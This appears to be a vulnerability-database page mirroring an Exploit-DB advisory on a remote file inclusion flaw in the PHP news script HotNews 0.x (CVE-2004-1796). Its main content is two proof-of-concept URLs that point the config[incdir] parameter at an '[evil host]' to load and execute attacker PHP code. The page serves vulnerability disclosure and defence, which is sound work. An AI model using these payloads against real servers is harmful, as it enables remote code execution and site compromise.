Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbOfficerrrEDB-ID:23518
HistoryJan 05, 2004 - 12:00 a.m.

HotNews 0.x - 'config[incdir]' Remote File Inclusion

2004-01-0500:00:00
Officerrr
www.exploit-db.com
12

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/9357/info
 
HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.

http://www.example.com/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3
http://www.example.com/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3

Related

nessus 1
cvelist 1
exploitdb 2
nvd 1
cve 1
nessus
nessus
HotNews Multiple Script Remote File Inclusion
2004-01-05 00:00:00
cvelist
cvelist
CVE-2004-1796
2005-05-10 04:00:00
exploitdb
exploitdb
HotNews 0.7.2 - Remote File Inclusion
2010-04-11 00:00:00
HotNews 0.x - 'hotnews-engine.inc.php3?config[header]' Remote File Inclusion
2004-01-05 00:00:00
nvd
nvd
CVE-2004-1796
2004-12-31 05:00:00
cve
cve
CVE-2004-1796
2005-05-10 04:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:23518
nessus1cvelist1exploitdb2nvd1cve1